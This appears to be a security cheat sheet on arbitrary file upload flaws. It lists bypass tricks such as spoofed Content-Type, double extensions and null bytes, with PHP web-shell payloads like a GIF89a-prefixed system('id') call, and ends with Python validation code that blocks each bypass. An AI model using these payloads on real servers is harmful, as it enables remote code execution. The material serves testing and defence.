Arbitrary File Upload
Introduction
An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.
Where to find
In any file upload feature, for example a profile photo upload.
How to exploit
- Change the Content-Type value

  Original request:

      POST /images/upload/ HTTP/1.1
      Host: target.com
      ...
      ---------------------------829348923824
      Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
      Content-Type: application/x-php

  Modified request:

      POST /images/upload/ HTTP/1.1
      Host: target.com
      ...
      ---------------------------829348923824
      Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
      Content-Type: image/jpeg

- Try to change the extension when sending the request. For example, here you cannot upload a file with the php extension, but you can upload a jpg file.

  Original request:

      POST /images/upload/ HTTP/1.1
      Host: target.com
      ...
      ---------------------------829348923824
      Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
      Content-Type: application/x-php

  Change the request to this:

      POST /images/upload/ HTTP/1.1
      Host: target.com
      ...
      ---------------------------829348923824
      Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
      Content-Type: application/x-php

- Upload the payload, but start it with GIF89a; and don't forget to change the Content-Type to image/gif

      POST /images/upload/ HTTP/1.1
      Host: target.com
      ...
      ---------------------------829348923824
      Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
      Content-Type: image/gif

      GIF89a; <?php system("id") ?>

- Bypass content-length validation: it can be bypassed using a small payload

      <?=`$_GET[x]`?>

- Use a null byte in the filename

      file.php%00.gif

- Use double extensions for the uploaded file

      file.jpg.php

- Upload with an unpopular PHP extension (php4, php5, php6, phtml)

      file.php5

- Randomly capitalize the file extension

      file.pHP5

- Mix the tips!
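The server-side checks that close each of the bypasses above, as an added example that is not from the original page; ALLOWED, EXECUTABLE, validate_upload and storage_name are assumed names for a hypothetical upload handler:

```python
import os
import secrets

# Constructed allow-list: extension -> (expected Content-Type, accepted magic-byte prefixes).
ALLOWED = {
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
}
# Extensions a PHP server may execute; rejected wherever they appear in the name.
EXECUTABLE = {"php", "php4", "php5", "php6", "phtml"}


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (accepted, reason-or-extension). The client's Content-Type is checked
    for consistency but never trusted alone; the decision rests on name and bytes."""
    # file.php%00.gif: reject a null byte whether it arrives decoded or still encoded.
    if "\x00" in filename or "%00" in filename:
        return False, "null byte in filename"
    name = os.path.basename(filename.replace("\\", "/"))  # strip any path component
    if not name or name.startswith("."):
        return False, "empty or hidden filename"
    # Examine every extension, lower-cased, so file.jpg.php, file.php.jpg and
    # file.pHP5 are all caught, not just the first or the last one.
    exts = name.lower().split(".")[1:]
    if not exts:
        return False, "no extension"
    if any(e in EXECUTABLE for e in exts):
        return False, "executable extension in name"
    if len(exts) != 1:
        return False, "multiple extensions"
    ext = exts[0]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    expected_type, magics = ALLOWED[ext]
    if content_type.split(";")[0].strip().lower() != expected_type:
        return False, "content-type does not match extension"
    # No minimum size: a short payload passes a length check anyway, so length is
    # not a control; the bytes must instead start with the magic for the extension.
    if not data.startswith(magics):
        return False, "magic bytes do not match extension"
    return True, ext


def storage_name(ext: str) -> str:
    """Server-chosen name: the client's filename never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"
```

A GIF89a-prefixed script body still passes the magic-byte check, so the last line of defence is storage_name plus keeping the upload directory outside the web root (or re-encoding the image), so that nothing uploaded is ever executed.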